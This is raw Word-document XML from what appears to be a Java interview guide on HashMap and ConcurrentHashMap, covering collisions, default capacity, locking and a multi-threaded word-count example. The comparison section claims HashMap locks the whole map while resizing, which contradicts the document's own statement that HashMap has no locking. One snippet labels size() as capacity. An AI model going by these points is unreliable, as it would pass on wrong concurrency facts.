          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it will replace the previous value at the same index (bucket) and update the entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49B6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75F0C"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5061125" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CCA4B7"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9D7C604"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D45082"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4D2168E3"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key1", "value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1A84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2", "value");  // Same value but different key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41608CA5"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00774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hash collision (same hash code but different keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC906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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C55F9"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AFEC8"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7D29E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happens when we add these two keys?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC73CF"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key1 and key2 might have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB38239"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wo entries will be stored in the same bucket in the hash table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A979D20"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ollisions occur, both keys will be stored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in Java 8+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157394FE"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currentHashMap Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2788E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designed for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operations, and it handles concurrent updates to the map more efficiently than HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAC07C" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207716FC"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ed Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ConcurrentHashMap divides the internal map structure into multiple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iginally in Java 7 and earlier versions, now it's split into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each bucket can be locked individually in Java 8+). Each thread locks a specific segment, so concurrent threads can work on different segments without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B99565"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xml:space="preserve">: When you update the ConcurrentHashMap, only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relevant segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Collisions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Internally, ConcurrentHashMap still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Handling Hash Collisions and Updates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F28C4F"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FDB201"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single lock for the entire map (non-thread-safe in terms of concurrent modifications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA29B25"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ollisions occur, keys with the same hash code are placed in the same bucket (in a linked list or tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26988F"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e same key, it will overwrite the existing value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B76FAD"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64435D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ncurrent reads and writes in a thread-safe manner by using finer granularity locks (like locks on buckets or segments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D315F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llisions similarly (using linked lists or trees) but ensures that concurrent updates to different keys or even the same key don't result in inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF2EF3"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threads can insert into different buckets concurrently without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB90846"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E7F6A21"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f you have two keys with the same hash code and different values, they will be stored in the same bucket and handled as separat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Java 8+). If the same key is inserted again with a new value, the value will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391741D7"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2A3DC" w14:textId="77777777" w:rsidR="001D5028" w:rsidRPr="00CE4B95" w:rsidRDefault="001D5028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="202" w:name="_Toc197867416"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default capacity of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="0E15062F" w14:textId="46FAB62A" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C340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default capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a HashMap in Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579AEA4D"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Additional Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B72C6"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xml:space="preserve">: When a HashMap is created without specifying an initial capacity, it starts with an initial capacity of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EF7DC"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The default </w:t>
      </w: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of a HashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0.75</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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4445CB9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HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1123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System.out.println("Initial Capacity: " + map.size()); // Will be 0 initially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72457D95"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 xml:space="preserve">So, the default HashMap starts with 16 buckets and will resize when the number of entries exceeds </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is 75% of 16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A31503" w14:textId="09BB8CB5"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154959B"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3" w:name="_Toc197867417"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you use ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="79C390B0" w14:textId="4F5E0417" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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should 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tuations where you need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map implementation with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It's particularly useful in multi-threaded environments, where multiple threads may read from and write to the map concurrently without causing inconsistencies or data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92BA4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practical scenarios where ConcurrentHashMap is preferred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E003571"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igh Concurrency in Multi-threaded Environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F041F"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ultiple threads need to perform operations like put(), get(), or remove() on the same map, ConcurrentHashMap ensures thread safety without locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DEB75"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concurrent access to different segments of the map, thereby enabling multiple threads to operate on separate segments or buckets in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DECB4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hared Cache or Data Store:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A6D71"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ConcurrentHashMap provides safe concurrent reads and writes, it prevents the cache from being corrupted due to simultaneous modifications by different threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C16D49"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uilding Thread-Safe Data Structures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A739E"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mplementing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread-safe counting map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (counting the number of occurrences of items in a concurrent environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B3E62"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You Need Fine-Grained Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B050865"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Instead of locking the entire map, it locks individual segments (or buckets) while performing updates, allowing multiple threads to update different parts of the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1FFFE2"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dealing with a high volume of concurrent read and write operations, this fine-grained locking will significantly improve performance compared to synchronizedMap or Hashtable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A837D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voiding Blocking on Reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01745DC0"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e Case: Counting Words in a Multi-threaded Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3D73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ConcurrentHashMap can be used to count words in a text with multiple threads processing different parts of the text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44949E1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1482BAC5" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7643D12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WordCountExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BCEC1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9028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ext = "hello world hello concurrent hashmap example";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A37B72"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wordCountMap = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C37BF1" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2076708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multiple threads counting words in different parts of the text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC758F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words = text.split(" ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CADB50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FixedThreadPool(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F05D223" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5B5C5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word : words) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F21DF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executor.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27756F7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CountMap.merge(word, 1, Integer::sum);  // thread-safe word counting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F41178B"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311300"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2C93A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDEBB4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64C40496"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executor.isTerminated()) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0CE53" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07282C3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word counts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34AFD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CountMap);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B9D7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E55C9D"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1EC037"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 Applications that Need Atomic Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0B4E7" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Not to Use ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1549B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ConcurrentHashMap is great for concurrent read and write operations, there are some situations where it may not be the best choice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB98437"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Full Synchronization is Required</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to perform complex, multi-step operations on the map that involve multiple keys or require locking the entire map (e.g., transactions), ConcurrentHashMap may not be suitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111F531"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You Need to Synchronize Entire Map Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your operations need a global lock on the map, you may need to use Collections.synchronizedMap() or implement your own locking mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F83004" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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ideal when you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, thread-safe map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal locking and good performance in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E252B7B" w14:textId="3429D10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86" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="064E557F"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4" w:name="_Toc197867418"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain HashMap vs ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w14:paraId="768E0D51" w14:textId="56FA79C5" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00D92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 Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FE47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ABBA96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hread safety with HashMap, you can use Collections.synchronizedMap() or explicitly synchronize it using synchronized blocks or methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680223A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351DBDEB"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chieves this by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segmenting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the map internally (in earlier versions) or using fine-grained locking (in Java 8 and later), which allows concurrent operations on different sections of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F14975"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king Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BF44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DF83644"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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism in HashMap. If you need to ensure thread safety during concurrent operations, you must handle it yourself using synchronization techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646B80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20FB38C"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In earlier versions of ConcurrentHashMap (Java 7 and before),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was locked independently. This allowed multiple threads to access different segments of the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67E01F"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S (Compare-And-Swap)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for atomic operations, making it much more scalable when handling concurrent reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DCC13"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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A9AF8"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1F7DA0F"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HashMap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t performs better in single-threaded applications or when external synchronization is applied, as it doesn’t have the overhead of synchronization built in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75539B"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faster for non-concurrent access because it doesn’t have the overhead of managing concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C153959"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545F594"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ncurrent reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without locking, making it faster in situations where read-heavy access is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F78E7A"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ull Keys and Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121B1DE"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4B1596D"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This can be useful in cases where you want to store absent keys with a null value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0AB40"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44768B72"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This restriction is intentional to avoid ambiguity, as null could be interpreted as the absence of a value or an indicator of a failed operation (e.g., putIfAbsent() returning null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D05C0C"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 Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6804B6"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5789977A"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supports basic methods like put(), get(), remove(), containsKey(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54850999"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o perform compound actions like inserting or updating a value conditionally, you'll need to handle synchronization manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE0A1A"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116640EB"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several </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atomic methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow thread-safe operations without external synchronization. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD53710"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IfAbsent(key, value): Adds the key-value pair only if the key is absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AE236E"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key, oldValue, newValue): Replaces the value only if it is currently associated with the specified old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391D26F"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IfAbsent(key, mappingFunction): Computes the value for the key if it is absent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C42AAE3"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rge(key, value, remappingFunction): Merges the value if the key exists or inserts a new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A2C582"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provide better concurrency and are designed to avoid locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137FD1D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sizing (Rehashing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1CEC4"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F860EBE"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rehashes)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the number of entries exceeds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multiplied by the current capacity. During resizing, the entire map is locked for rehashing, which can be expensive in multi-threaded scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F06B30"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64CD3F2"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in a thread-safe manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130A634"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264EA9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single-threaded environments or when external synchronization is already handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74876FB3"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thread safety is not a concern, and performance is a priority in non-concurrent contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD51A9F"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2C6B023B"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multi-threaded environments where high concurrency is required, and thread safety needs to be maintained without using synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20415B5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like concurrent caching, parallel data processing, or shared data in a multi-threaded application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658E9A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D92DCB" w:rsidRPr="00CE4B95" w14:paraId="373201BD" w14:textId="77777777" w:rsidTr="00B43006">
